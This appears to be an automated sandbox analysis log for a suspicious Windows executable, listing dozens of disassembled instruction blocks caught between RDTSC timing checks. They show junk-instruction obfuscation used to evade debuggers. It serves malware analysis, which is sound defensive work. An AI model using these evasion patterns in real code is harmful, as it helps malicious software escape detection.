Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | RDTSC instruction interceptor: First address: 747076B second address: 74707C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F9665989DB1h 0x00000009 xor ax, 8C36h 0x0000000e jmp 00007F9665989DB1h 0x00000013 popfd 0x00000014 mov edi, esi 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 mov eax, dword ptr [ebx+20h] 0x0000001c pushad 0x0000001d mov edi, 20201ECAh 0x00000022 popad 0x00000023 mov dword ptr [esi+40h], eax 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 pushfd 0x0000002a jmp 00007F9665989DAAh 0x0000002f xor si, 2A88h 0x00000034 jmp 00007F9665989DABh 0x00000039 popfd 0x0000003a popad 0x0000003b rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | RDTSC instruction interceptor: First address: 74707C9 second address: 7470801 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9665249A04h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebx+00000080h] 0x0000000f jmp 00007F9665249A00h 0x00000014 push 00000001h 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 pushad 0x0000001a popad 0x0000001b pushad 0x0000001c popad 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | RDTSC instruction interceptor: First address: 7470801 second address: 7470842 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F9665989DB4h 0x00000009 adc al, 00000078h 0x0000000c jmp 00007F9665989DABh 0x00000011 popfd 0x00000012 mov bx, ax 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 nop 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F9665989DB1h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | RDTSC instruction interceptor: First address: 7470842 second address: 7470852 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F96652499FCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | RDTSC instruction interceptor: First address: 7470852 second address: 7470875 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov cl, dl 0x0000000e jmp 00007F9665989DB4h 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | RDTSC instruction interceptor: First address: 7470875 second address: 7470887 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F96652499FEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | RDTSC instruction interceptor: First address: 7470887 second address: 74708C9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9665989DABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c jmp 00007F9665989DB6h 0x00000011 lea eax, dword ptr [ebp-10h] 0x00000014 jmp 00007F9665989DB0h 0x00000019 nop 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | RDTSC instruction interceptor: First address: 74708C9 second address: 74708CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | RDTSC instruction interceptor: First address: 74708CF second address: 74708D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | RDTSC instruction interceptor: First address: 74708D5 second address: 74708D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | RDTSC instruction interceptor: First address: 74708D9 second address: 74708FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F9665989DB8h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | RDTSC instruction interceptor: First address: 74708FC second address: 7470941 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F9665249A01h 0x00000009 sub ah, FFFFFFA6h 0x0000000c jmp 00007F9665249A01h 0x00000011 popfd 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 nop 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F9665249A03h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7470988 second address: 7470999 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9665989DADh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7470999 second address: 7470A0B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, di 0x00000006 pushfd 0x00000007 jmp 00007F9665249A03h 0x0000000c sbb ah, FFFFFFFEh 0x0000000f jmp 00007F9665249A09h 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 js 00007F96D52B86E6h 0x0000001e jmp 00007F96652499FEh 0x00000023 mov eax, dword ptr [ebp-0Ch] 0x00000026 jmp 00007F9665249A00h 0x0000002b mov dword ptr [esi+04h], eax 0x0000002e push eax 0x0000002f push edx 0x00000030 push eax 0x00000031 push edx 0x00000032 jmp 00007F96652499FAh 0x00000037 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7470A0B second address: 7470A0F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7470A0F second address: 7470A15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7470A15 second address: 7470A1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7470A1B second address: 7470A55 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9665249A08h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b lea eax, dword ptr [ebx+78h] 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F9665249A07h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7470A55 second address: 7470A6D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9665989DB4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7470A6D second address: 7470A83 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push 00000001h 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov ecx, 7A42A4BFh 0x00000012 mov di, cx 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7470A83 second address: 7470AB4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9665989DB1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov dh, 40h 0x0000000f call 00007F9665989DB4h 0x00000014 pop ecx 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7470AB4 second address: 7470AF9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9665249A00h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F9665249A01h 0x00000011 and ah, 00000026h 0x00000014 jmp 00007F9665249A01h 0x00000019 popfd 0x0000001a pushad 0x0000001b mov esi, 435F6E2Dh 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7470AF9 second address: 7470B3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 nop 0x00000007 pushad 0x00000008 pushfd 0x00000009 jmp 00007F9665989DB4h 0x0000000e or esi, 6BC119F8h 0x00000014 jmp 00007F9665989DABh 0x00000019 popfd 0x0000001a popad 0x0000001b lea eax, dword ptr [ebp-08h] 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F9665989DB0h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7470B3E second address: 7470B88 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, dx 0x00000006 push edi 0x00000007 pop ecx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F9665249A01h 0x00000015 sub esi, 3B1FBFF6h 0x0000001b jmp 00007F9665249A01h 0x00000020 popfd 0x00000021 jmp 00007F9665249A00h 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7470B88 second address: 7470B9A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9665989DAEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7470BF2 second address: 7470BF6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7470BF6 second address: 7470BFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7470BFC second address: 7470C02 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7470C02 second address: 7470C06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7470C06 second address: 7470C0A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7470C0A second address: 7470C1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 js 00007F96D59F884Dh 0x0000000e pushad 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7470C1C second address: 7470C8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F9665249A04h 0x0000000a xor cx, 8298h 0x0000000f jmp 00007F96652499FBh 0x00000014 popfd 0x00000015 popad 0x00000016 pushfd 0x00000017 jmp 00007F9665249A08h 0x0000001c add esi, 42232CF8h 0x00000022 jmp 00007F96652499FBh 0x00000027 popfd 0x00000028 popad 0x00000029 mov eax, dword ptr [ebp-04h] 0x0000002c push eax 0x0000002d push edx 0x0000002e jmp 00007F9665249A05h 0x00000033 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7470C8D second address: 7470CB7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F9665989DB7h 0x00000008 mov si, 7EFFh 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov dword ptr [esi+08h], eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7470CB7 second address: 7470CBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7470CBB second address: 7470CBF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7470CBF second address: 7470CC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7470CC5 second address: 7470CFB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9665989DB6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebx+70h] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F9665989DB7h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7470CFB second address: 7470D4A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9665249A09h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push 00000001h 0x0000000b jmp 00007F96652499FEh 0x00000010 nop 0x00000011 jmp 00007F9665249A00h 0x00000016 push eax 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F96652499FEh 0x0000001e rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7470D4A second address: 7470D50 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7470D50 second address: 7470D54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7470D54 second address: 7470D9B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9665989DADh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c jmp 00007F9665989DAEh 0x00000011 lea eax, dword ptr [ebp-18h] 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 pushfd 0x00000018 jmp 00007F9665989DACh 0x0000001d or eax, 7EAB14C8h 0x00000023 jmp 00007F9665989DABh 0x00000028 popfd 0x00000029 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7470D9B second address: 7470DAF instructions: 0x00000000 rdtsc 0x00000002 mov esi, 41498A3Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dx, ax 0x0000000c popad 0x0000000d nop 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7470DAF second address: 7470DB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7470DB3 second address: 7470DC6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F96652499FFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7470DC6 second address: 7470DCC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7470DCC second address: 7470DE4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F96652499FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7470DE4 second address: 7470DE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7470DE8 second address: 7470DFA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F96652499FEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7470E4F second address: 7470E53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7470E53 second address: 7470E57 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7470E57 second address: 7470E5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7470E5D second address: 7470E63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7470E63 second address: 7470E67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7470E67 second address: 7470E6B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7470E6B second address: 7470EB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test edi, edi 0x0000000a jmp 00007F9665989DB0h 0x0000000f js 00007F96D59F85D0h 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 pushfd 0x00000019 jmp 00007F9665989DADh 0x0000001e sbb ax, 14C6h 0x00000023 jmp 00007F9665989DB1h 0x00000028 popfd 0x00000029 mov esi, 6D887577h 0x0000002e popad 0x0000002f rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7470EB9 second address: 7470F69 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F96652499FDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebp-14h] 0x0000000c jmp 00007F96652499FEh 0x00000011 mov ecx, esi 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007F96652499FEh 0x0000001a sub ecx, 036A67C8h 0x00000020 jmp 00007F96652499FBh 0x00000025 popfd 0x00000026 pushfd 0x00000027 jmp 00007F9665249A08h 0x0000002c sbb eax, 2AD56A28h 0x00000032 jmp 00007F96652499FBh 0x00000037 popfd 0x00000038 popad 0x00000039 mov dword ptr [esi+0Ch], eax 0x0000003c pushad 0x0000003d pushfd 0x0000003e jmp 00007F9665249A04h 0x00000043 sub ch, FFFFFF88h 0x00000046 jmp 00007F96652499FBh 0x0000004b popfd 0x0000004c push esi 0x0000004d mov al, bl 0x0000004f pop esi 0x00000050 popad 0x00000051 mov edx, 775606ECh 0x00000056 push eax 0x00000057 push edx 0x00000058 jmp 00007F96652499FAh 0x0000005d rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7470F69 second address: 7470FB4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9665989DABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub eax, eax 0x0000000b jmp 00007F9665989DAFh 0x00000010 lock cmpxchg dword ptr [edx], ecx 0x00000014 pushad 0x00000015 mov cx, 0FEBh 0x00000019 mov ecx, 57A5BFC7h 0x0000001e popad 0x0000001f pop edi 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F9665989DB9h 0x00000027 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7470FB4 second address: 7470FEC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop esi 0x00000005 mov dh, ECh 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a test eax, eax 0x0000000c pushad 0x0000000d mov edi, ecx 0x0000000f pushfd 0x00000010 jmp 00007F96652499FCh 0x00000015 xor ch, 00000008h 0x00000018 jmp 00007F96652499FBh 0x0000001d popfd 0x0000001e popad 0x0000001f jne 00007F96D52B80F2h 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7470FEC second address: 7470FF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7470FF0 second address: 7470FF6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7470FF6 second address: 7471098 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9665989DAAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edx, dword ptr [ebp+08h] 0x0000000c pushad 0x0000000d popad 0x0000000e mov eax, dword ptr [esi] 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F9665989DB4h 0x00000017 xor si, BAC8h 0x0000001c jmp 00007F9665989DABh 0x00000021 popfd 0x00000022 movzx esi, dx 0x00000025 popad 0x00000026 mov dword ptr [edx], eax 0x00000028 jmp 00007F9665989DABh 0x0000002d mov eax, dword ptr [esi+04h] 0x00000030 pushad 0x00000031 mov ecx, 36597F4Bh 0x00000036 mov dl, al 0x00000038 popad 0x00000039 mov dword ptr [edx+04h], eax 0x0000003c pushad 0x0000003d pushad 0x0000003e call 00007F9665989DAFh 0x00000043 pop ecx 0x00000044 mov eax, edx 0x00000046 popad 0x00000047 mov ax, bx 0x0000004a popad 0x0000004b mov eax, dword ptr [esi+08h] 0x0000004e jmp 00007F9665989DB7h 0x00000053 mov dword ptr [edx+08h], eax 0x00000056 pushad 0x00000057 mov cl, EFh 0x00000059 movsx edx, si 0x0000005c popad 0x0000005d mov eax, dword ptr [esi+0Ch] 0x00000060 push eax 0x00000061 push edx 0x00000062 push eax 0x00000063 push edx 0x00000064 pushad 0x00000065 popad 0x00000066 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7471098 second address: 747109C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 747109C second address: 74710A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 74710A2 second address: 74710E7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F96652499FAh 0x00000009 adc ch, 00000048h 0x0000000c jmp 00007F96652499FBh 0x00000011 popfd 0x00000012 mov si, 6FBFh 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 mov dword ptr [edx+0Ch], eax 0x0000001c jmp 00007F9665249A02h 0x00000021 mov eax, dword ptr [esi+10h] 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 mov esi, edi 0x00000029 mov cx, bx 0x0000002c popad 0x0000002d rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 74710E7 second address: 747110E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9665989DB2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+10h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F9665989DAAh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 747110E second address: 7471114 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7471114 second address: 74711D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F9665989DACh 0x00000009 jmp 00007F9665989DB5h 0x0000000e popfd 0x0000000f mov ecx, 1191D957h 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 mov eax, dword ptr [esi+14h] 0x0000001a jmp 00007F9665989DAAh 0x0000001f mov dword ptr [edx+14h], eax 0x00000022 jmp 00007F9665989DB0h 0x00000027 mov eax, dword ptr [esi+18h] 0x0000002a pushad 0x0000002b mov bx, cx 0x0000002e popad 0x0000002f mov dword ptr [edx+18h], eax 0x00000032 pushad 0x00000033 jmp 00007F9665989DB5h 0x00000038 pushfd 0x00000039 jmp 00007F9665989DB0h 0x0000003e xor al, FFFFFF88h 0x00000041 jmp 00007F9665989DABh 0x00000046 popfd 0x00000047 popad 0x00000048 mov eax, dword ptr [esi+1Ch] 0x0000004b push eax 0x0000004c push edx 0x0000004d pushad 0x0000004e pushfd 0x0000004f jmp 00007F9665989DABh 0x00000054 sub si, AECEh 0x00000059 jmp 00007F9665989DB9h 0x0000005e popfd 0x0000005f movzx eax, dx 0x00000062 popad 0x00000063 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 74711D9 second address: 7471205 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F96652499FAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+1Ch], eax 0x0000000c jmp 00007F9665249A00h 0x00000011 mov eax, dword ptr [esi+20h] 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 pushad 0x00000018 popad 0x00000019 mov eax, ebx 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7471205 second address: 7471250 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9665989DB4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+20h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f movsx edi, si 0x00000012 pushfd 0x00000013 jmp 00007F9665989DB6h 0x00000018 adc ecx, 6695E738h 0x0000001e jmp 00007F9665989DABh 0x00000023 popfd 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7471250 second address: 7471256 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7471256 second address: 747125A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 747125A second address: 747125E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
